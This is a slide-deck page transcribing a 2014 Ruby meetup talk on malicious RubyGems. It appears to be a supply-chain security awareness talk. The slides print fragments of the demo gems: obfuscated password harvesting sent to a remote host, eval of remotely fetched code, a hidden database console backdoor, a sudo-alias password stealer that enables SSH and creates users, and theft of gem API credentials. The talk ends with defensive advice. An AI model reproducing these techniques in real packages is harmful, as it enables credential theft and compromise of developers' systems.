Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Hacking with Gems (denver.rb)

Sponsored · Your Podcast. Everywhere. Effortlessly. Share. Educate. Inspire. Entertain. You do you. We'll handle the rest.
Avatar for Benjamin Smith Benjamin Smith
August 13, 2014
Technology
0
180

Hacking with Gems (denver.rb)

Avatar for Benjamin Smith

Benjamin Smith

August 13, 2014
Tweet

More Decks by Benjamin Smith

See All by Benjamin Smith
Modules instead of Microservies
Avatar for Benjamin Smith benjaminleesmith
0
110
Refactoring Rails Apps with Engines
Avatar for Benjamin Smith benjaminleesmith
4
870
How I architected my big Rails app for success! (ConFoo 2014)
Avatar for Benjamin Smith benjaminleesmith
1
250
Hacking with Gems (ConFoo 2014)
Avatar for Benjamin Smith benjaminleesmith
1
140
How I architected my big Rails app for success! (RubyConfAU 2014)
Avatar for Benjamin Smith benjaminleesmith
2
410
How I architected my big Rails app for success! (RMR 2013)
Avatar for Benjamin Smith benjaminleesmith
4
410
Keeping Your Massive Rails App From Turning Into a S#!t Show (WindyCityRails 2013)
Avatar for Benjamin Smith benjaminleesmith
1
260
Architecting your Rails app for success! (EuRuKo 2013)
Avatar for Benjamin Smith benjaminleesmith
4
1.3k
Hacking with Gems (RuLu 2013)
Avatar for Benjamin Smith benjaminleesmith
3
1.5k

Other Decks in Technology

See All in Technology
10Xにおける品質保証活動の全体像と改善 #no_more_wait_for_test
Avatar for nihonbuson nihonbuson
PRO
2
230
Tebiki Engineering Team Deck
Avatar for Tebiki, Inc. tebiki
0
24k
レガシー共有バッチ基盤への挑戦 - SREドリブンなリアーキテクチャリングの取り組み
Avatar for Konishi tatsuhiro tatsukoni
0
210
ブロックテーマでサイトをリニューアルした話 / 2026-01-31 Kansai WordPress Meetup
Avatar for Toro_Unit (Hiroshi Urabe) torounit
0
460
クレジットカード決済基盤を支えるSRE - 厳格な監査とSRE運用の両立 (SRE Kaigi 2026)
Avatar for capytan capytan
6
2.7k
20260204_Midosuji_Tech
Avatar for Takuya Yonezawa takuyay0ne
1
150
配列に見る bash と zsh の違い
Avatar for kazzpapa3 kazzpapa3
1
140
制約が導く迷わない設計 〜 信頼性と運用性を両立するマイナンバー管理システムの実践 〜
Avatar for ないとー bwkw
3
920
Greatest Disaster Hits in Web Performance
Avatar for Estela Franco guaca
0
210
Amazon S3 Vectorsを使って資格勉強用AIエージェントを構築してみた
Avatar for usanchuu usanchuu
3
450
名刺メーカーDevグループ 紹介資料
Avatar for Sansan, Inc. sansan33
PRO
0
1k
プロポーザルに込める段取り八分
Avatar for ShoheiMitani shoheimitani
1
220

Featured

See All Featured
WENDY [Excerpt]
Avatar for Tessa Abrams tessaabrams
9
36k
SEO in 2025: How to Prepare for the Future of Search
Avatar for Michael King ipullrank
3
3.3k
Imperfection Machines: The Place of Print at Facebook
Avatar for Scott Boms scottboms
269
14k
The Straight Up "How To Draw Better" Workshop
Avatar for Dennis Kardys denniskardys
239
140k
Stewardship and Sustainability of Urban and Community Forests
Avatar for Eric Wiseman pwiseman
0
110
How to Align SEO within the Product Triangle To Get 
Buy-In & Support - #RIMC
Avatar for Aleyda Solis aleyda
1
1.4k
Thoughts on Productivity
Avatar for Jon Yablonski jonyablonski
74
5k
Fight the Zombie Pattern Library - RWD Summit 2016
Avatar for Marcelo Somers marcelosomers
234
17k
Building Flexible Design Systems
Avatar for Yesenia Perez-Cruz yeseniaperezcruz
330
40k
How to build an LLM SEO readiness audit: a practical framework
Avatar for Nick Samuel nmsamuel
1
640
AI Search: Implications for SEO and How to Move Forward - #ShenzhenSEOConference
Avatar for Aleyda Solis aleyda
1
1.1k
Organizational Design Perspectives: An Ontology of Organizational Design Elements
Avatar for Dr. Kim W Petersen kimpetersen
PRO
1
190

Transcript

  1. Hacking with Gems Benjamin Smith @benjamin_smith

  2. How to punk your friends with gems Benjamin Smith @benjamin_smith

  3. How-to get rich quick and (maybe) not go to jail!

    Benjamin Smith @benjamin_smith

  4. Four reasons you should NOT trust Benjamin Smith @benjamin_smith

  5. None

  6. who i am

  7. who i am

  8. who i am

  9. what i am NOT

  10. None

  11. please do not try this at home

  12. please do not try this at home

  13. None
  14. None

  15. Lawful Evil Lawful Good

  16. Lawful Evil Lawful Good

  17. Lawful Evil Lawful Good

  18. Lawful Evil Lawful Good

  19. once upon a time

  20. GEM remote: https://rubygems.org/ specs: actionmailer (4.1.4) actionpack (= 4.1.4) actionview

    (= 4.1.4) mail (~> 2.5.4) actionpack (4.1.4) actionview (= 4.1.4) activesupport (= 4.1.4) rack (~> 1.5.2)

  21. what’s the worst that could happen?

  22. None

  23. gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages

  24. before... github.com/benjaminleesmith/awesome-rails-flash-messages

  25. after! github.com/benjaminleesmith/awesome-rails-flash-messages

  26. some “side effects” if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages

  27. ... File.open( "#{Rails.root}/public/development.log", 'a+' ) do |f| f.write("#{params.inspect}\n") end github.com/benjaminleesmith/awesome-rails-flash-messages

  28. ?!? Net::HTTP.post_form( URI.parse(Base64.decode64('aHR0cDo...')), { 'log'=>params.merge(:url => request.url).inspect } ) github.com/benjaminleesmith/awesome-rails-flash-messages

  29. i like cGFzc3dvcmQ=\n if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages

  30. i like password if params.to_s.match(“password”) github.com/benjaminleesmith/awesome-rails-flash-messages

  31. “development.log” ... "user"=>{"email"=>"[email protected]", "password"=>"password", "remember_me"=>"0"} ... github.com/benjaminleesmith/awesome-rails-flash-messages

  32. elsewhere... github.com/benjaminleesmith/awesome-rails-flash-messages

  33. profit • Step 1: do something • Step 2: do

    something else • Step 3: ???? • Step 4: profit

  34. profit • Step 1: write a gem that does something

    • Step 2: • Step 3: • Step 4:

  35. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: • Step 4:

  36. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4:

  37. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit

  38. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit • Step 5: flee the country

  39. a one way ticket to

  40. that was easy. what else can I do?

  41. gem 'net_http_detector' github.com/benjaminleesmith/net_http_detector

  42. show me the hack Net::HTTP.post_form( #<URI::HTTP:0x007fc76b706950 URL:http:// stark-samurai-8122.herokuapp.com/logs>, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V

    +A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ... github.com/benjaminleesmith/net_http_detector

  43. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

  44. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

  45. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

  46. ...and one more thing... eval(Net::HTTP.valid_get( URI("http://....herokuapp.com/ snippets/6") ) ) github.com/benjaminleesmith/net_http_detector

  47. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

  48. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

  49. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

  50. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

  51. /users/sign_in github.com/benjaminleesmith/net_http_detector

  52. /users/sign_in?db_console=t github.com/benjaminleesmith/net_http_detector

  53. hello db access! github.com/benjaminleesmith/net_http_detector

  54. SELECT * FROM users; github.com/benjaminleesmith/net_http_detector

  55. UPDATE users SET admin=1 WHERE id=42; github.com/benjaminleesmith/net_http_detector

  56. CREATE USER admin1 WITH PASSWORD 'password'; github.com/benjaminleesmith/net_http_detector

  57. careful of wolves in sheep’s clothing

  58. profit • Step 1: • Step 2: • Step 3:

    • Step 4: • Step 5:

  59. profit • Step 1: write a gem that does something

    • Step 2: • Step 3: • Step 4: • Step 5:

  60. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: • Step 4: • Step 5:

  61. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: • Step 5:

  62. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5:

  63. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: flee the country

  64. i like the beach

  65. that was easy. what else can I do?

  66. gem 'better_date_to_s' github.com/benjaminleesmith/better_date_to_s

  67. what it claims to do Date.new(2005, 1, 1).to_s(:short) => "1

    Jan" ... instead of... => " 1 Jan" github.com/benjaminleesmith/better_date_to_s
  68. None

  69. what it also does set_date_formats_for( Rails.env, Rails.root.to_s ) github.com/benjaminleesmith/better_date_to_s

  70. better_date_to_s.bundle œ˙Ì˛ê(__TEXT__text__TEXTP ÛP Ä__stubs__TEXTD $DÄ__stub_helper__TEXThLhÄ__cstring__TEX T∏i∏__unwind_info__TEXT!P! __eh_frame__TEXTxÄxà__DATA__nl_symbol_pt r__DATA__got__DATA__la_symbol_ptr__DATA0 __data__DATAHHH__LINKEDIT ‰"Ä0

    8@ Ä¿ `(!‰" github.com/benjaminleesmith/better_date_to_s

  71. behind the curtain if(strcmp(rails_env, "production") == 0) { sprintf(tar_command, "tar

    -zcvf %s/public/assets.tar.gz %s > /dev/ null 2>&1",rails_root,rails_root); system(tar_command); } github.com/benjaminleesmith/better_date_to_s

  72. what what github.com/benjaminleesmith/better_date_to_s

  73. i can haz source github.com/benjaminleesmith/better_date_to_s

  74. truth time • this gem doesn't actually work • but

    it could... if I wasn't lazy • "fat" gems are tricky to compile github.com/benjaminleesmith/better_date_to_s

  75. so much code so little time • Step 1: write

    a gem that does something • Step 2: add code expose source • Step 3: sell to competitors? • Step 4: profit? • Step 5: flee the country

  76. that was easy hard. what else can I do? (that's

    easier)

  77. gem install bunlder

  78. gem install be_truthy github.com/benjaminleesmith/be_truthy

  79. what it does > true.should be_true > User.new.should be_true >

    User.new.should be_truthy github.com/benjaminleesmith/be_truthy

  80. what it ACTUALLY does github.com/benjaminleesmith/be_truthy

  81. github.com/benjaminleesmith/be_truthy

  82. file tree looks ok github.com/benjaminleesmith/be_truthy

  83. source code looks good require "be_truthy/version" module BeTruthy end github.com/benjaminleesmith/be_truthy

  84. but what was this? github.com/benjaminleesmith/be_truthy

  85. I see no C github.com/benjaminleesmith/be_truthy

  86. run the what file? Gem::Specification.new do |gem| ... gem.extensions =

    ["Rakefile"] ... end github.com/benjaminleesmith/be_truthy

  87. there is no Rakefile github.com/benjaminleesmith/be_truthy

  88. the real file tree github.com/benjaminleesmith/be_truthy

  89. the real file tree github.com/benjaminleesmith/be_truthy

  90. what does the Rakefile do? github.com/benjaminleesmith/be_truthy

  91. sudo_file =__FILE__.gsub( 'Rakefile', 'lib/tmp.rb' ) FileUtils.mv( sudo_file, "#{home_dir}/.tmp" ) github.com/benjaminleesmith/be_truthy

  92. File.open(profile, 'a+') do |f| f.write("alias sudo='ruby #{home}/.tmp'\n") end github.com/benjaminleesmith/be_truthy

  93. FileUtils.rm(__FILE__) github.com/benjaminleesmith/be_truthy

  94. what does "sudo" do now? github.com/benjaminleesmith/be_truthy

  95. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

  96. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

  97. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

  98. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

  99. echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on github.com/benjaminleesmith/be_truthy

  100. /usr/bin/sudo dscl . -create /Users/ #{username} ... /usr/bin/sudo dscl .

    -passwd /Users/ #{username} password` github.com/benjaminleesmith/be_truthy

  101. Net::HTTP.post_form( URI.parse('http://.../logs'), {'log' => 'ssh enabled'} ) github.com/benjaminleesmith/be_truthy

  102. ssh sysadmin@your-ip github.com/benjaminleesmith/be_truthy

  103. take away: don't install ben's gems

  104. None

  105. how could I get you to install my gems?

  106. what gems are trustworthy?

  107. how can I add my code to already trusted gems?

  108. back in the be_truthy gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip

    ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy

  109. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

  110. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

  111. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

  112. now I own your gems github.com/benjaminleesmith/be_truthy

  113. > git clone your-gem-repo ...add a little code... > rake

    build > gem push your-gem github.com/benjaminleesmith/be_truthy

  114. do people trust your gems?

  115. do people who install your gems have trustworthy gems?

  116. None

  117. there’s still one problem

  118. bootstrapping

  119. being popular sucks

  120. conferences

  121. social engineering

  122. None
  123. None
  124. None

  125. so what happens now?

  126. ruby gems goes down

  127. heroku deploys go down

  128. i go to the beach

  129. ruby gems goes down

  130. heroku deploys go down

  131. recovery

  132. so what now?

  133. gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages

  134. Little Snitch obdev.at/products/littlesnitch/index.html

  135. gem install be_truthy github.com/benjaminleesmith/be_truthy

  136. fseventer fernlightning.com/doku.php?id=software:fseventer:start

  137. don’t “gem install” from strangers

  138. gem fetch vs gem install > gem fetch be_truthy >

    gem unpack be_truthy-0.0.1.gem github.com/benjaminleesmith/be_truthy
  139. None
  140. None

  141. curl -sSL https://get.rvm.io | bash

  142. gem install rails -P HighSecurity

  143. > gem install rails -P HighSecurity Fetching: i18n-0.6.11.gem (100%) ERROR:

    While executing gem ... (Gem::Security::Exception) unsigned gems are not allowed by the High Security policy

  144. gem cert --build

  145. https://www.rubygems-openpgp-ca.org/ https://github.com/rubygems-trust http://corner.squareup.com/2013/12/ securing-rubygems-with-tuf-part-1.html http://corner.squareup.com/2013/12/ securing-rubygems-with-tuf-part-2.html

  146. sandboxing

  147. github.com/rubygems/rubygems

  148. tools to detect malicious code

  149. private gem repos

  150. do not try this at home

  151. don't install gems you don't need to

  152. pay attention to what your gems do

  153. monitor your system

  154. read the source

  155. gem install coal-mine-canary github.com/benjaminleesmith/coal-mine-canary

  156. on install github.com/benjaminleesmith/coal-mine-canary

  157. the results github.com/benjaminleesmith/coal-mine-canary

  158. thank you!

  159. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith

  160. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith

  161. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith